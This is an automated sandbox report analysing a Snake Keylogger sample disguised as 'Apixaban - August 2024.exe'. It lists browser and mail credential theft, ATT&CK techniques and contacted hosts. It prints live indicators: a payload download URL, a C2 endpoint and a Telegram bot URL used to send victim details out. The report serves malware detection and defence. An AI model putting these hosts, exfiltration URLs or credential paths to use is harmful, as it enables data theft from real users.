          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeCode function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F0A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 0000000A.00000002.2653419991.00000000251E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Yara detected Telegram RAT
          Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1372, type: MEMORYSTR
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1372, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 0000000A.00000002.2653419991.00000000251E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Yara detected Telegram RAT
          Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1372, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		1
          OS Credential Dumping          		2
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		1
          Web Service          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Native API          		Boot or Logon Initialization Scripts111
          Process Injection          		2
          Obfuscated Files or Information          		LSASS Memory116
          System Information Discovery          		Remote Desktop Protocol1
          Data from Local System          		3
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          PowerShell          		Logon Script (Windows)Logon Script (Windows)1
          Software Packing          		Security Account Manager1
          Query Registry          		SMB/Windows Admin Shares1
          Email Collection          		21
          Encrypted Channel          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          DLL Side-Loading          		NTDS211
          Security Software Discovery          		Distributed Component Object Model1
          Clipboard Data          		3
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Masquerading          		LSA Secrets1
          Process Discovery          		SSHKeylogging14
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
          Virtualization/Sandbox Evasion          		Cached Domain Credentials41
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
          Process Injection          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          System Network Configuration Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1481493 Sample: Apixaban - August 2024.exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 34 reallyfreegeoip.org 2->34 36 api.telegram.org 2->36 38 5 other IPs or domains 2->38 44 Found malware configuration 2->44 46 Multi AV Scanner detection for dropped file 2->46 48 Multi AV Scanner detection for submitted file 2->48 54 7 other signatures 2->54 8 Apixaban - August 2024.exe 1 19 2->8         started        signatures3 50 Tries to detect the country of the analysis system (by using the IP) 34->50 52 Uses the Telegram API (likely for C&C communication) 36->52 process4 file5 22 C:\Users\user\AppData\...\Kompottens.Sub, ASCII 8->22 dropped 56 Suspicious powershell command line found 8->56 12 powershell.exe 20 8->12         started        signatures6 process7 file8 24 C:\Users\user\...\Apixaban - August 2024.exe, PE32 12->24 dropped 26 Apixaban - August ...exe:Zone.Identifier, ASCII 12->26 dropped 58 Writes to foreign memory regions 12->58 60 Found suspicious powershell code related to unpacking or dynamic code loading 12->60 62 Powershell drops PE file 12->62 16 wab.exe 15 8 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 28 electromac.com.bo 192.185.142.133, 49728, 49729, 587 UNIFIEDLAYER-AS-1US United States 16->28 30 api.telegram.org 149.154.167.220, 443, 49727 TELEGRAMRU United Kingdom 16->30 32 3 other IPs or domains 16->32 40 Tries to steal Mail credentials (via file / registry access) 16->40 42 Tries to harvest and steal browser information (history, passwords, etc) 16->42 signatures12

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Apixaban - August 2024.exe53%ReversingLabsWin32.Spyware.Snakekeylogger

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren\Apixaban - August 2024.exe53%ReversingLabsWin32.Spyware.Snakekeylogger

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
          http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
          https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
          https://www.ecosia.org/newtab/0%URL Reputationsafe
          https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
          http://checkip.dyndns.org/0%URL Reputationsafe
          https://aka.ms/pscore6lB0%URL Reputationsafe
          https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
          http://x1.c.lencr.org/00%URL Reputationsafe
          http://x1.i.lencr.org/00%URL Reputationsafe
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://nuget.org/nuget.exe0%URL Reputationsafe
          https://reallyfreegeoip.org0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
          https://reallyfreegeoip.org/xml/0%URL Reputationsafe
          https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
          https://api.telegram.org0%Avira URL Cloudsafe
          https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
          https://www.office.com/0%Avira URL Cloudsafe
          https://api.telegram.org/bot0%Avira URL Cloudsafe
          https://www.office.com/lB0%Avira URL Cloudsafe
          https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
          http://r10.i.lencr.org/010%Avira URL Cloudsafe
          http://r10.o.lencr.org0#0%Avira URL Cloudsafe
          https://api.telegram.org/bot/sendMessage?chat_id=&text=0%Avira URL Cloudsafe
          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20a0%Avira URL Cloudsafe
          https://github.com/Pester/Pester0%Avira URL Cloudsafe
          https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
          http://mail.electromac.com.bo0%Avira URL Cloudsafe
          http://electromac.com.bo0%Avira URL Cloudsafe
          http://51.38.247.67:8081/_send_.php?L0%Avira URL Cloudsafe
          https://www.reap.skyestates.com.mt/wp-includes/yPrtLahZfwrl128.bin0%Avira URL Cloudsafe
          https://go.microsoft0%Avira URL Cloudsafe
          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20and%20Time:%2026/07/2024%20/%2003:56:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20061544%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.reap.skyestates.com.mt
          		108.167.181.251
          		truefalse
            		unknown
            reallyfreegeoip.org
            		188.114.96.3
            		truetrue
              		unknown
              electromac.com.bo
              		192.185.142.133
              		truetrue
                		unknown
                api.telegram.org
                		149.154.167.220
                		truetrue
                  		unknown
                  checkip.dyndns.com
                  		193.122.6.168
                  		truefalse
                    		unknown
                    mail.electromac.com.bo
                    		unknown
                    		unknowntrue
                      		unknown
                      checkip.dyndns.org
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.33false
                        • URL Reputation: safe
                        		unknown
                        http://checkip.dyndns.org/false
                        • URL Reputation: safe
                        		unknown
                        https://www.reap.skyestates.com.mt/wp-includes/yPrtLahZfwrl128.binfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20and%20Time:%2026/07/2024%20/%2003:56:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20061544%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://www.office.com/wab.exe, 0000000A.00000002.2653419991.00000000253CC000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://duckduckgo.com/chrome_newtabwab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2241111452.0000000005E87000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://duckduckgo.com/ac/?q=wab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://r10.i.lencr.org/01wab.exe, 0000000A.00000002.2640536687.0000000009672000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2656016294.00000000274BF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2653419991.0000000025357000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2656016294.00000000274CB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://api.telegram.orgwab.exe, 0000000A.00000002.2653419991.00000000252C4000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.google.com/images/branding/product/ico/googleg_lodp.icowab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2238762105.0000000004F76000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://api.telegram.org/botwab.exe, 0000000A.00000002.2653419991.00000000252C4000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2238762105.0000000004F76000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 00000002.00000002.2241111452.0000000005E87000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.office.com/lBwab.exe, 0000000A.00000002.2653419991.00000000253C7000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 00000002.00000002.2241111452.0000000005E87000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=wab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://r10.o.lencr.org0#wab.exe, 0000000A.00000002.2640536687.0000000009672000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2656016294.00000000274BF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2653419991.0000000025357000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2656016294.00000000274CB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://electromac.com.bowab.exe, 0000000A.00000002.2653419991.0000000025380000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2653419991.0000000025357000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=wab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://nsis.sf.net/NSIS_ErrorErrorApixaban - August 2024.exe, 00000000.00000000.1382639575.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Apixaban - August 2024.exe, 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20awab.exe, 0000000A.00000002.2653419991.00000000252C4000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=wab.exe, 0000000A.00000002.2653419991.00000000252C4000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://chrome.google.com/webstore?hl=enwab.exe, 0000000A.00000002.2653419991.000000002539B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2653419991.00000000253CC000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.ecosia.org/newtab/wab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2238762105.0000000004F76000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://mail.electromac.com.bowab.exe, 0000000A.00000002.2653419991.0000000025380000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2653419991.0000000025357000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ac.ecosia.org/autocomplete?q=wab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://51.38.247.67:8081/_send_.php?Lwab.exe, 0000000A.00000002.2653419991.0000000025357000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2238762105.0000000004E21000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://reallyfreegeoip.org/xml/8.46.123.33$wab.exe, 0000000A.00000002.2653419991.00000000252C4000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://x1.c.lencr.org/0wab.exe, 0000000A.00000002.2656016294.00000000274BF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2653419991.0000000025357000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2656016294.00000000274CB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://x1.i.lencr.org/0wab.exe, 0000000A.00000002.2656016294.00000000274BF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2653419991.0000000025357000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2656016294.00000000274CB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/powershell.exe, 00000002.00000002.2241111452.0000000005E87000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2241111452.0000000005E87000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://go.microsoftpowershell.exe, 00000002.00000002.2238176030.0000000003008000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://reallyfreegeoip.orgwab.exe, 0000000A.00000002.2653419991.00000000252C4000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2653419991.000000002522B000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://go.microsof)powershell.exe, 00000002.00000002.2238176030.0000000003008000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2238762105.0000000004E21000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=wab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://reallyfreegeoip.org/xml/wab.exe, 0000000A.00000002.2653419991.000000002522B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          149.154.167.220
                          		api.telegram.orgUnited Kingdom
                          		62041TELEGRAMRUtrue
                          192.185.142.133
                          		electromac.com.boUnited States
                          		46606UNIFIEDLAYER-AS-1UStrue
                          193.122.6.168
                          		checkip.dyndns.comUnited States
                          		31898ORACLE-BMC-31898USfalse
                          188.114.96.3
                          		reallyfreegeoip.orgEuropean Union
                          		13335CLOUDFLARENETUStrue
                          108.167.181.251
                          		www.reap.skyestates.com.mtUnited States
                          		46606UNIFIEDLAYER-AS-1USfalse

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1481493
                          Start date and time:2024-07-25 10:03:38 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 7m 44s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:12
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Apixaban - August 2024.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@6/11@5/5
                          EGA Information:
                          • Successful, ratio: 66.7%
                          HCA Information:
                          • Successful, ratio: 97%
                          • Number of executed functions: 114
                          • Number of non-executed functions: 72
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target powershell.exe, PID 332 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: Apixaban - August 2024.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          04:04:34API Interceptor44x Sleep call for process: powershell.exe modified
                          04:06:03API Interceptor287x Sleep call for process: wab.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          149.154.167.220Torpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                              Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                                Lisect_AVT_24003_G1B_33.exeGet hashmaliciousUnknownBrowse
                                  DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    Install.msiGet hashmaliciousUnknownBrowse
                                      rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                                        z23RevisedInvoice.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                          Updated PI.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                            rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              193.122.6.168SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtfGet hashmaliciousSnake KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              Confirmation transfer Copy AGS # 24-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              Orden de Compra..exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              Fekdjuvq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              neworder.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              ORDER INQUIRY_QTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              QvS0a5bvCMM8EUj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              SecuriteInfo.com.Trojan.AutoIt.1413.12984.723.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              SecuriteInfo.com.Trojan.MSIL.Crypt.25795.12791.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                              • checkip.dyndns.org/

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              reallyfreegeoip.orgTorpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
